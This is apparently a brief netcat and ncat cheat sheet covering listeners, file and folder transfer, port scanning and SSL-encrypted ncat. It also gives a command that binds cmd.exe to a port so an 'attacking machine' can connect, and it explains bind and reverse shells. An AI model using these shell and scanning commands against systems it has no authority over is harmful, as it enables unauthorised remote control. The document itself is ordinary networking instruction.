Use listen command on the server side.
nc -l -p <port>
Connect to the server from client on the same port.
nc <server> <port>
Can be done on the same machine also.
Use server machine to give command
nc -v -w 30 -p <port> -l < file.txt
On the client machine give command
nc -v -w 2 <server ip> <port> > receivedfile.txt
-w is for wait and the -v is for verbose output. The file.txt will be received as receivedfile.txt on the client machine. Works on local machine as well. Test.
It can be done with telnet as well but this does not alter the stream of data unlike telnet. Just nc to the ip using a specific port to get the info regarding the server running.
Use -z for zero input output.
nc -v <ip> -z <port-start>-<port-end>
-n option can also be used. This does not do a DNS scan on the given ip address which does save time. Even -w can be used to wait specified number of seconds.
To execute a remote shell on windows, get an nc command executed as follows
nc -lp <port> -vv -e cmd.exe
Then execute nc on the attacking machine as follows
nc <ip> <port>
It is always unencrypted. Since this is always unsafe, there is a version of netcat called cryptcat which has two fish encryption.
If the listener uses the -e option it is called a direct shell. If the connecting machine uses the -e option it is called a reverse shell.
This can help in situations where not both the machines on the network can port forward.
To transfer a folder having the files to be sent, on the sender use command
tar -cf - <foldername> | nc -l -p 1337
On the receiving machine type command
nc <sender ip> 1337 | tar -xf -
ncat is a more modern version of netcat which is implemented by nmap libraries. It has support for multiple protocols and transmission over ssl.
On the listener type
ncat [options] [arguments] --allow <allowed ip> -vln <port> --ssl
Only connections from allowed ip will be allowed will have an encrypted channel. The connection will be allowed but not established form the allowed ip if the command from that ip does not contain the ssl option. On allowed ip type
ncat -vn <listener> <l port> --ssl